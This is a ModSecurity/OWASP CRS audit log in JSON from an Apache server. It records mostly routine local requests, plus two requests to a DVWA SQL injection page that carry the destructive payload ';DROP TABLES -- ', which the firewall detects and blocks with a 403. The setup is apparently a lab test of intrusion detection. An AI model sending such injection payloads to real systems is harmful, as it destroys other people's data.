[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc24n8AAQEAAAkW4SAAAAAB\"]"],"stopwatch":{"p1":433,"p2":1168,"p3":58,"p4":171,"p5":52,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc2438AAQEAAAkW4SEAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2438AAQEAAAkW4SEAAAAB\"]"],"stopwatch":{"p1":384,"p2":892,"p3":43,"p4":362,"p5":49,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc2438AAQEAAAkW4SIAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2438AAQEAAAkW4SIAAAAB\"]"],"stopwatch":{"p1":391,"p2":1063,"p3":138,"p4":334,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:15 --0400","transaction_id":"WRc2738AAQEAAAkXs@sAAAAC","remote_address":"192.168.75.181","remote_port":46620,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":605,"p2":2936,"p3":0,"p4":0,"p5":271,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:17 --0400","transaction_id":"WRc28X8AAQEAAAkXs@wAAAAC","remote_address":"192.168.75.181","remote_port":46620,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":382,"p2":2019,"p3":0,"p4":0,"p5":158,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFYAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:40:00 GMT","If-None-Match":"\"294-54f6a791bc669\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:40:22 GMT","ETag":"\"295-54f6a7a6d5cf8\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2@X8AAQEAAAkYuFYAAAAD\"]"],"stopwatch":{"p1":383,"p2":1113,"p3":60,"p4":147,"p5":52,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFcAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2@X8AAQEAAAkYuFcAAAAD\"]"],"stopwatch":{"p1":709,"p2":1219,"p3":69,"p4":465,"p5":71,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
